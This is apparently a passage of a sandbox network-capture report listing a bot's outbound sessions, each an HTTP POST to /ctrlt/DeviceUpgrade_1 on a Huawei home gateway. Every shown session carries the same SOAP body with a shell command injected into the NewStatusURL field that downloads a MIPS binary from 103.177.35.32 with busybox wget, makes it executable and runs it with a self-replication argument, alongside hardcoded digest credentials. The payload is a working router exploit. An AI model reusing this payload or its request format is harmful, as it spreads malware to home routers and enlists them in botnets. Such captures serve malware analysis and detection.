                                                        Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 72 6d 20 2d 72 66 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 20 2d 6c 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 20 2d 72 20 2f 74 61 6a 6d 61 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f [TRUNCATED]
                                                        Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(rm -rf /tmp/linuxxx; /bin/busybox wget -g 103.177.35.32 -l /tmp/linuxxx -r /tajma.mips; /bin/busybox chmod 777 /tmp/linuxxx; /tmp/linuxxx selfrep.tajma)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2252192.168.2.2338218157.241.47.11337215
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:13.577250004 CEST860OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept: */*
                                                        Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                        Content-Length: 491
                                                        Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 72 6d 20 2d 72 66 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 20 2d 6c 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 20 2d 72 20 2f 74 61 6a 6d 61 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f [TRUNCATED]
                                                        Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(rm -rf /tmp/linuxxx; /bin/busybox wget -g 103.177.35.32 -l /tmp/linuxxx -r /tajma.mips; /bin/busybox chmod 777 /tmp/linuxxx; /tmp/linuxxx selfrep.tajma)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2253192.168.2.2350102197.21.175.19037215
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:13.577338934 CEST860OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept: */*
                                                        Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                        Content-Length: 491
                                                        Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 72 6d 20 2d 72 66 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 20 2d 6c 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 20 2d 72 20 2f 74 61 6a 6d 61 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f [TRUNCATED]
                                                        Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(rm -rf /tmp/linuxxx; /bin/busybox wget -g 103.177.35.32 -l /tmp/linuxxx -r /tajma.mips; /bin/busybox chmod 777 /tmp/linuxxx; /tmp/linuxxx selfrep.tajma)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2254192.168.2.2359780197.138.97.21837215
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:13.577429056 CEST860OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept: */*
                                                        Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                        Content-Length: 491
                                                        Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 72 6d 20 2d 72 66 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 20 2d 6c 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 20 2d 72 20 2f 74 61 6a 6d 61 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f [TRUNCATED]
                                                        Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(rm -rf /tmp/linuxxx; /bin/busybox wget -g 103.177.35.32 -l /tmp/linuxxx -r /tajma.mips; /bin/busybox chmod 777 /tmp/linuxxx; /tmp/linuxxx selfrep.tajma)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2255192.168.2.235222641.195.98.3737215
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:13.577609062 CEST860OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept: */*
                                                        Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                        Content-Length: 491
                                                        Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 72 6d 20 2d 72 66 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 20 2d 6c 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 20 2d 72 20 2f 74 61 6a 6d 61 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f [TRUNCATED]
                                                        Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(rm -rf /tmp/linuxxx; /bin/busybox wget -g 103.177.35.32 -l /tmp/linuxxx -r /tajma.mips; /bin/busybox chmod 777 /tmp/linuxxx; /tmp/linuxxx selfrep.tajma)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2256192.168.2.2360258126.134.152.2237215
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:13.577615976 CEST860OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept: */*
                                                        Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                        Content-Length: 491
                                                        Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 72 6d 20 2d 72 66 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 20 2d 6c 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 20 2d 72 20 2f 74 61 6a 6d 61 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f [TRUNCATED]
                                                        Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(rm -rf /tmp/linuxxx; /bin/busybox wget -g 103.177.35.32 -l /tmp/linuxxx -r /tajma.mips; /bin/busybox chmod 777 /tmp/linuxxx; /tmp/linuxxx selfrep.tajma)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2257192.168.2.2357028157.213.170.12037215
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:13.577735901 CEST860OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept: */*
                                                        Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                        Content-Length: 491
                                                        Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 72 6d 20 2d 72 66 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 20 2d 6c 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 20 2d 72 20 2f 74 61 6a 6d 61 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f [TRUNCATED]
                                                        Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(rm -rf /tmp/linuxxx; /bin/busybox wget -g 103.177.35.32 -l /tmp/linuxxx -r /tajma.mips; /bin/busybox chmod 777 /tmp/linuxxx; /tmp/linuxxx selfrep.tajma)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2258192.168.2.236062860.174.157.10537215
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:13.577750921 CEST860OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept: */*
                                                        Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                        Content-Length: 491
                                                        Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 72 6d 20 2d 72 66 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 20 2d 6c 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 20 2d 72 20 2f 74 61 6a 6d 61 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f [TRUNCATED]
                                                        Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(rm -rf /tmp/linuxxx; /bin/busybox wget -g 103.177.35.32 -l /tmp/linuxxx -r /tajma.mips; /bin/busybox chmod 777 /tmp/linuxxx; /tmp/linuxxx selfrep.tajma)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2259192.168.2.2343796191.147.13.4737215
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:13.577750921 CEST860OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept: */*
                                                        Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                        Content-Length: 491
                                                        Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 72 6d 20 2d 72 66 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 20 2d 6c 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 20 2d 72 20 2f 74 61 6a 6d 61 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f [TRUNCATED]
                                                        Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(rm -rf /tmp/linuxxx; /bin/busybox wget -g 103.177.35.32 -l /tmp/linuxxx -r /tajma.mips; /bin/busybox chmod 777 /tmp/linuxxx; /tmp/linuxxx selfrep.tajma)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2260192.168.2.2344994157.231.175.18137215
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:13.577774048 CEST860OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept: */*
                                                        Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                        Content-Length: 491
                                                        Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 72 6d 20 2d 72 66 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 20 2d 6c 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 20 2d 72 20 2f 74 61 6a 6d 61 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f [TRUNCATED]
                                                        Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(rm -rf /tmp/linuxxx; /bin/busybox wget -g 103.177.35.32 -l /tmp/linuxxx -r /tajma.mips; /bin/busybox chmod 777 /tmp/linuxxx; /tmp/linuxxx selfrep.tajma)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2261192.168.2.2358034112.158.54.3137215
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:13.577776909 CEST860OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept: */*
                                                        Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                        Content-Length: 491
